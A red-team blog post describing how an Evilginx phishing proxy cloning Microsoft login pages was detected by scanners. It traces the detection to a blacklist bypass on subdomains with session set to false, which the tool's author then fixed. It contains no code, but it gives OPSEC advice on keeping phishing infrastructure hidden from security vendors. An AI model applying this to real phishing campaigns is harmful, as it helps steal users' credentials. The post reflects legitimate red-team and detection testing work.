Introduction
Earlier this week, Spotit’s detection engineering team reached out to our red team with the request to set up a basic Evilginx server to test new detection strategies against modern Adversary-in-the-Middle (AitM) attacks, in order to better protect Spotit and its customers.
Having set up this type of infrastructure countless times during red team engagements, this seemed like an easy task. However, things turned out quite interestingly after our infrastructure got detected by some security vendors within minutes of spinning up the Evilginx server. What was particularly interesting about this is that these security vendors managed to detect the Evilginx infrastructure even when the built-in blacklist feature was used and without any “Lure URL” being sent over email.
Further investigation of how this was possible led us to discover a significant issue within Evilginx that might already have resulted in countless Evilginx servers relying on the built-in blacklist functionality to have been unknowingly detected this way. These findings were shared with Kuba Gretzky (the creator of Evilginx), who quickly released an emergency fix to address this issue.
Evilginx Setup
Our detection engineering team was specifically interested in detecting Adversary-in-the-Middle attacks against our own Microsoft login page using CSS-based Canary Tokens (more on that later). To properly test this, the red team assisted by setting up a simulated phishing website against the Microsoft login page using Evilginx.
Since Microsoft is a common target for these kinds of attacks, dozens of readily available phishlet configurations can be found online, so we will not focus on the config too much here and only zoom in on the relevant parts: the proxy_hosts
.
In this example, we intercept the traffic of the following three domains:
- login.microsoftonline.com
- www.office.com
- aadcdn.msftauth.net
Since we were just setting up Evilginx for the detection engineering team and not for a real phishing campaign, the phishing subdomains to which the previous domains would be mapped did not require to be very advanced and were just set to test
, test1
and test2
respectively. For this blog, let’s say these subdomains were hosted on the malicious.com
domain.
To prevent scanners from security vendors from accessing the phishing site, Evilginx comes with a built-in blacklist feature that can be configured to redirect unwanted visitors to a different location.
In fact, the default blacklist setting will redirect any “unauthorized” visitor to the configured unauth_url
. A visitor is considered unauthorized if it does not end up on the website using a specific “Lure URL” created in Evilginx. Every Lure URL contains a specific random ID which allows Evilginx to distinguish between an actual victim that we want to target and an automated scanner attempting to check whether the website is malicious.
In this case, Evilginx was configured to redirect any unauthorized visitors (who are trying to access the website without a valid Lure URL) to the Spotit company website.
At this point, we were ready to enable the Evilginx server.
Detection
Assuming the blacklist feature would redirect all scanners to the Spotit website, we could safely put the website on the internet now without having to worry about most basic scanners detecting our infrastructure.
However, without even sharing a valid lure URL with our detection team, one of the subdomains was already blocked by Google Safe Browsing within minutes after making it accessible to the internet.
How was that possible?
We initially thought they might have been fingerprinting Evilginx directly through some static indicators which can be observed before the redirection of the blacklist takes place. This is certainly possible as Evilginx is known to have several static indicators (such as the specific JavaScript it uses to redirect unauthorized visitors, the TLS fingerprints (e.g. JA3S), …)
Although that would not explain why only one of the three phishing subdomains was detected and blocked (test1.malicious.com).
In fact, the main phishing landing page (test.malicious.com) was still undetected.
- login.microsoftonline.com
- test.malicious.com
- www.office.com
- test1.malicious.com
- aadcdn.msftauth.net
- test2.malicious.com
This shows that something had to be different which resulted in the cloned www.office.com website being detected, but the cloned login.microsoftonline.com not.
After some time, we received a takedown request from Netcraft’s automatic Takedown Service. Netcraft works together with hosting providers and domain registrars to inform the owners of domains when they detect suspicious content on their websites.
As part of this notice, Netcraft shares a report containing automatically created screenshots as evidence of why they believe the website is hosting malicious content.
To our surprise, these screenshots contained the actual Microsoft Office website which was cloned on the test1.malicious.com
subdomain.
How were they able to access the actual cloned website? Shouldn’t the Evilginx blacklist redirect the scanner to the Spotit website? Furthermore, Evilginx did not even show any entries in its logs about any scanner accessing the test1
subdomain (even with blacklist logging enabled).
The only way they should be able to access the cloned website should be if they were somehow able to get hold of a valid Lure URL that would temporarily whitelist their IP address. But that was impossible as we did not send the lure URL over any medium through which a security vendor could have gained access to it.
Additionally, the timestamp of the detection was so close to the original setup of Evilginx, which rather points in the direction of the subdomain being automatically scanned after appearing in Certificate Transparency Logs when the SSL Certificate was requested.
So did this scanner really find a bypass for the Evilginx blacklist, or is this all too much credit?
Unraveling
At this point we clearly needed to do some more testing in order to investigate how this was possible.
We tried accessing the landing page website from a non-whitelisted IP address from which we had not accessed the lure URL. As expected, this returns a redirect to the unauth_url
and adds our IP address to the blacklist.
So far so good. Let’s now try the same for the test1 subdomain after clearing the blacklist and restarting Evilginx.
Surprisingly though, we did not get blacklisted this time and were able to access the cloned website just like the scanner observed, and this without having to do anything special at all.
Let’s take a step back and look at our phishlet configuration.
My first thought was that the blacklist maybe only worked on the landing pages. Although when asking Kuba (the creator of Evilginx) about this, he assured me that the blacklist should work on all subdomains part of the phishlet.
The other main difference we see between the test
and test1
subdomains is the session
parameter.
Although the Evilginx documentation does not mention that this parameter has any effect on the blacklist either. It only mentions that the setting should be set to true
if cookies or credentials would need to be captured from that domain, and otherwise it can be safely set to false
.
Just for science though, let’s set the session
parameter to true
for the test1
subdomain, and try to access it again from an unauthorized source.
Interestingly it now correctly redirects the visitor to the unauth_url
as expected. So it seems like setting the session
parameter to false
might unintentionally cause features such as the blacklist to break.
Impact
On its own, this issue might not seem that impactful at first. After all, by the time your phishing campaign is being investigated by the blue team, their initial attention will be usually drawn to the main landing page, at which point experienced security analysts should be able to quickly identify other indicators that would lead them to the same conclusion. (Especially when the red team has not taken other OPSEC measures to protect their infrastructure.)
However, the impact of this issue really becomes apparent when Certificate Transparency Logs are used by security vendors to instantly scan your website the moment a TLS certificate is requested for your domains. As observed previously, this can result in your domain being instantly detected as malicious and subsequently cause it to be blocked by various security vendors before even starting your phishing campaign.
Looking at popular repos where example phishlets for commonly targetted websites are shared, it becomes clear that this issue is unknowingly affecting a lot of phishlets.
Fix
After identifying the root cause, we shared our findings with the creator of Evilginx. He individually confirmed this behavior and stated this was an oversight that he had not accounted for, but that this did indeed have a fairly significant impact.
Within two hours of this confirmation, Kuba already shared a fix to address this issue. The most important change is highlighted in the following screenshot (although some other minor tweaks were necessary to ensure that this would work).
To summarize, every phishing subdomain will now be treated as if the session
parameter was set to true
in its config, whereas this was previously only the case if it was explicitly configured with the session
parameter or if it was configured as a landing page with the is_landing
parameter.
Kuba asked us to test whether this fixed the issue. After confirming this indeed was the case, the fix was published to GitHub and announced on Twitter.
Conclusion
If you’re using Evilginx during your assessments and rely on the built-in blacklist functionality, then you should really make sure to pull the latest Evilginx version containing the fix to protect your campaigns.
However, for those of you really looking to improve your OPSEC, there are still a lot of other indicators that you need to consider. In a future blog post, we will take a deep dive into how to take your OPSEC to the next level when using Evilginx.
Oh, and those Canary Tokens? We have some tricks up our sleeves to deal with those as well. Stay tuned!